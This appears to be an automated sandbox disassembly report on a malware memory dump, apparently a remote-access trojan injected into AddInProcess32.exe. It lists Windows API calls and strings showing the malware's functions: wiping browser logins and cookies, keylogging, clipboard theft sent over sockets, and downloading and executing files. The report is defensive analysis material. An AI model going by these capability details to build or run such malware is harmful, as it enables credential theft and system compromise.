                                                                                  • String ID: SystemDrive$cmd.exe
                                                                                  • API String ID: 2994406822-3633465311
                                                                                  APIs
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040AAF0
                                                                                  • FindClose.KERNEL32(00000000), ref: 0040AB0A
                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040AC2D
                                                                                  • FindClose.KERNEL32(00000000), ref: 0040AC53
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: Find$CloseFile$FirstNext
                                                                                  • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                  APIs
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040ACF0
                                                                                  • FindClose.KERNEL32(00000000), ref: 0040AD0A
                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040ADCA
                                                                                  • FindClose.KERNEL32(00000000), ref: 0040ADF0
                                                                                  • FindClose.KERNEL32(00000000), ref: 0040AE11
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Find$Close$File$FirstNext
                                                                                  • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                  APIs
                                                                                  • OpenClipboard.USER32 ref: 00414EC2
                                                                                  • EmptyClipboard.USER32 ref: 00414ED0
                                                                                  • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 00414EF0
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00414EF9
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00414F2F
                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00414F38
                                                                                  • CloseClipboard.USER32 ref: 00414F55
                                                                                  • OpenClipboard.USER32 ref: 00414F5C
                                                                                  • GetClipboardData.USER32(0000000D), ref: 00414F6C
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00414F75
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
                                                                                  • CloseClipboard.USER32 ref: 00414F84
                                                                                    • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                  • String ID:
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00472200,00000001), ref: 0041A076
                                                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00472200,00000001), ref: 0041A0A6
                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00472200,00000001), ref: 0041A118
                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00472200,00000001), ref: 0041A125
                                                                                    • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00472200,00000001), ref: 0041A0FB
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00472200,00000001), ref: 0041A146
                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00472200,00000001), ref: 0041A15C
                                                                                  • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00472200,00000001), ref: 0041A163
                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00472200,00000001), ref: 0041A16C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                  • String ID: pth_unenc
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 0$1$2$3$4$5$6$7
                                                                                  APIs
                                                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004727F8), ref: 00418714
                                                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00418763
                                                                                  • GetLastError.KERNEL32 ref: 00418771
                                                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 004187A9
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                  • String ID:
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040B2DC
                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0040B3AF
                                                                                  • FindClose.KERNEL32(00000000), ref: 0040B3BE
                                                                                  • FindClose.KERNEL32(00000000), ref: 0040B3E9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Find$CloseFile$FirstNext
                                                                                  • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                  APIs
                                                                                  • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129B8
                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129C4
                                                                                    • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                  • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 00412CBA
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00412CC1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                  • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 00446741
                                                                                  • _free.LIBCMT ref: 00446765
                                                                                  • _free.LIBCMT ref: 004468EC
                                                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045C1E4), ref: 004468FE
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F754,000000FF,00000000,0000003F,00000000,?,?), ref: 00446976
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F7A8,000000FF,?,0000003F,00000000,?), ref: 004469A3
                                                                                  • _free.LIBCMT ref: 00446AB8
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                  • String ID:
                                                                                  APIs
                                                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040A98F
                                                                                  • GetLastError.KERNEL32 ref: 0040A999
                                                                                  Strings
                                                                                  • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040A95A
                                                                                  • [Chrome StoredLogins not found], xrefs: 0040A9B3
                                                                                  • [Chrome StoredLogins found, cleared!], xrefs: 0040A9BF
                                                                                  • UserProfile, xrefs: 0040A95F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DeleteErrorFileLast
                                                                                  • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
                                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
                                                                                  • GetLastError.KERNEL32 ref: 00415CDB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                  • String ID: SeShutdownPrivilege
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __floor_pentium4
                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00408393
                                                                                    • Part of subcall function 004048A8: connect.WS2_32(?,?,?), ref: 004048C0
                                                                                    • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040842F
                                                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040848D
                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 004084E5
                                                                                  • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 004084FC
                                                                                    • Part of subcall function 00404E06: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E18
                                                                                    • Part of subcall function 00404E06: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E23
                                                                                    • Part of subcall function 00404E06: CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E2C
                                                                                  • FindClose.KERNEL32(00000000), ref: 004086F4
                                                                                    • Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,0040545D,?,?,00000004,?,?,00000004,?,00471E90,?), ref: 00404B27
                                                                                    • Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00471E90,?,?,?,?,?,?,0040545D), ref: 00404B55
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                                                  • String ID:
                                                                                  • API String ID: 1824512719-0
                                                                                  APIs
                                                                                    • Part of subcall function 00410201: SetLastError.KERNEL32(0000000D,00410781,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 00410207
                                                                                  • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041079C
                                                                                  • GetNativeSystemInfo.KERNEL32(?,0040BE60,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041080A
                                                                                  • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 0041082E
                                                                                    • Part of subcall function 00410708: VirtualAlloc.KERNEL32(00000004,00000004,00000004,00000004,0041084C,?,00000000,00003000,00000004,00000000,?,?), ref: 00410718
                                                                                  • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00410875
                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0041087C
                                                                                  • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041098F
                                                                                    • Part of subcall function 00410ADC: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,0041099C,?,?,?,?,?), ref: 00410B4C
                                                                                    • Part of subcall function 00410ADC: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00410B53
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 3950776272-0
                                                                                  APIs
                                                                                  • GetForegroundWindow.USER32(00472008,?,00472008), ref: 0040949C
                                                                                  • GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
                                                                                  • GetKeyboardLayout.USER32(00000000), ref: 004094AE
                                                                                  • GetKeyState.USER32(00000010), ref: 004094B8
                                                                                  • GetKeyboardState.USER32(?), ref: 004094C5
                                                                                  • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                                                                                  • String ID:
                                                                                  • API String ID: 3566172867-0
                                                                                  APIs
                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,00418656,00000000), ref: 00418A09
                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,00418656,00000000), ref: 00418A1E
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A2B
                                                                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,00418656,00000000), ref: 00418A36
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A48
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A4B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                  • String ID:
                                                                                  • API String ID: 276877138-0
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(00000000,?), ref: 00417D01
                                                                                  • FindNextFileW.KERNEL32(00000000,?,?), ref: 00417DCD
                                                                                    • Part of subcall function 0041A20F: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040983B), ref: 0041A228
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • API ID: File$Find$CreateFirstNext
                                                                                  • String ID: H"G$`'G$`'G
                                                                                  • API String ID: 341183262-2774397156
                                                                                  APIs
                                                                                    • Part of subcall function 00415C90: GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
                                                                                    • Part of subcall function 00415C90: OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
                                                                                    • Part of subcall function 00415C90: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
                                                                                    • Part of subcall function 00415C90: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
                                                                                    • Part of subcall function 00415C90: GetLastError.KERNEL32 ref: 00415CDB
                                                                                  • ExitWindowsEx.USER32(00000000,00000001), ref: 00414E56
                                                                                  • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00414E6B
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00414E72
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                  • String ID: PowrProf.dll$SetSuspendState
                                                                                  • API String ID: 1589313981-1420736420
                                                                                  APIs
                                                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0044F93B,?,00000000), ref: 0044F6B5
                                                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0044F93B,?,00000000), ref: 0044F6DE
                                                                                  • GetACP.KERNEL32(?,?,0044F93B,?,00000000), ref: 0044F6F3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • API ID: InfoLocale
                                                                                  • String ID: ACP$OCP
                                                                                  • API String ID: 2299586839-711371036
                                                                                  APIs
                                                                                  • FindResourceA.KERNEL32(SETTINGS,0000000A), ref: 004194A4
                                                                                  • LoadResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194B8
                                                                                  • LockResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194BF
                                                                                  • SizeofResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194CE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                  • String ID: SETTINGS
                                                                                  • API String ID: 3473537107-594951305
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004087A5
                                                                                  • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040881D
                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00408846
                                                                                  • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040885D
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • API ID: Find$File$CloseFirstH_prologNext
                                                                                  • String ID:
                                                                                  • API String ID: 1157919129-0
                                                                                  APIs
                                                                                    • Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                                                                    • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                                    • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                                                                    • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                                    • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                                                                                    • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 00445791
                                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0044F8FC
                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 0044F957
                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 0044F966
                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,00441F7E,00000040,?,0044209E,00000055,00000000,?,?,00000055,00000000), ref: 0044F9AE
                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00441FFE,00000040), ref: 0044F9CD
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                  • String ID:
                                                                                  • API String ID: 745075371-0
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0040784D
                                                                                  • FindFirstFileW.KERNEL32(00000000,?,004632A8,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407906
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040792E
                                                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040793B
                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407A51
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                                  • String ID:
                                                                                  • API String ID: 1771804793-0
                                                                                  APIs
                                                                                    • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,00410C6A), ref: 00419F34
                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E305
                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 0040E329
                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E338
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040E4EF
                                                                                    • Part of subcall function 00419F51: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040DFB9,00000000,?,?,00000001), ref: 00419F66
                                                                                    • Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C
                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E4E0
                                                                                  • API ID: ProcessProcess32$NextOpen$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                  • String ID:
                                                                                  • API String ID: 1735047541-0
                                                                                  APIs
                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004064D2
                                                                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004065B6
                                                                                  Strings
                                                                                  • API ID: DownloadExecuteFileShell
                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$open
                                                                                  • API String ID: 2825088817-2881483049
                                                                                  APIs
                                                                                  • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041A861
                                                                                    • Part of subcall function 0041215F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041216E
                                                                                    • Part of subcall function 0041215F: RegSetValueExA.KERNELBASE(?,00464150,00000000,?,00000000,00000000,00472200,?,pth_unenc,0040E23B,00464150,3.8.0 Pro), ref: 00412196
                                                                                    • Part of subcall function 0041215F: RegCloseKey.ADVAPI32(?,?,pth_unenc,0040E23B,00464150,3.8.0 Pro), ref: 004121A1
                                                                                  Strings
                                                                                  • API ID: CloseCreateInfoParametersSystemValue
                                                                                  • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                  • API String ID: 4127273184-3576401099
                                                                                  APIs
                                                                                    • Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                                                                    • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                                    • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                                                                    • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00441F85,?,?,?,?,004419DC,?,00000004), ref: 0044EF9A
                                                                                  • _wcschr.LIBVCRUNTIME ref: 0044F02A
                                                                                  • _wcschr.LIBVCRUNTIME ref: 0044F038
                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00441F85,00000000,004420A5), ref: 0044F0DB
                                                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                  • String ID:
                                                                                  • API String ID: 4212172061-0
                                                                                  APIs
                                                                                    • Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                                                                    • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                                    • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                                                                    • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                                    • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                                                                                    • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 00445791
                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F2F7
                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F348
                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F408
                                                                                  • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                  • String ID:
                                                                                  • API String ID: 2829624132-0
                                                                                  APIs
                                                                                  • IsDebuggerPresent.KERNEL32 ref: 004399A4
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004399AE
                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 004399BB
                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                  • String ID:
                                                                                  • API String ID: 3906539128-0
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(?,?,0044078B,?), ref: 004407D6
                                                                                  • TerminateProcess.KERNEL32(00000000,?,0044078B,?), ref: 004407DD
                                                                                  • ExitProcess.KERNEL32 ref: 004407EF
                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                  • String ID:
                                                                                  • API String ID: 1703294689-0
                                                                                  APIs
                                                                                  • OpenClipboard.USER32(00000000), ref: 0040A65D
                                                                                  • GetClipboardData.USER32(0000000D), ref: 0040A669
                                                                                  • CloseClipboard.USER32 ref: 0040A671
                                                                                  • API ID: Clipboard$CloseDataOpen
                                                                                  • String ID:
                                                                                  • API String ID: 2058664381-0
                                                                                  APIs
                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 004329F3
                                                                                  Strings
                                                                                  • API ID: FeaturePresentProcessor
                                                                                  • String ID: P@
                                                                                  • API String ID: 2325560087-676759640
                                                                                  Strings
                                                                                  • API ID:
                                                                                  • String ID: .
                                                                                  • API String ID: 0-248832578
                                                                                  APIs
                                                                                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004419DC,?,00000004), ref: 00445E6F
                                                                                  Strings
                                                                                  • API ID: InfoLocale
                                                                                  • String ID: GetLocaleInfoEx
                                                                                  • API String ID: 2299586839-2904428671
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 004068E8
                                                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 004069B0
                                                                                    • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                  • API ID: FileFind$FirstNextsend
                                                                                  • String ID:
                                                                                  • API String ID: 4113138495-0
                                                                                  APIs
                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00450506,?,?,00000008,?,?,004533BD,00000000), ref: 00450738
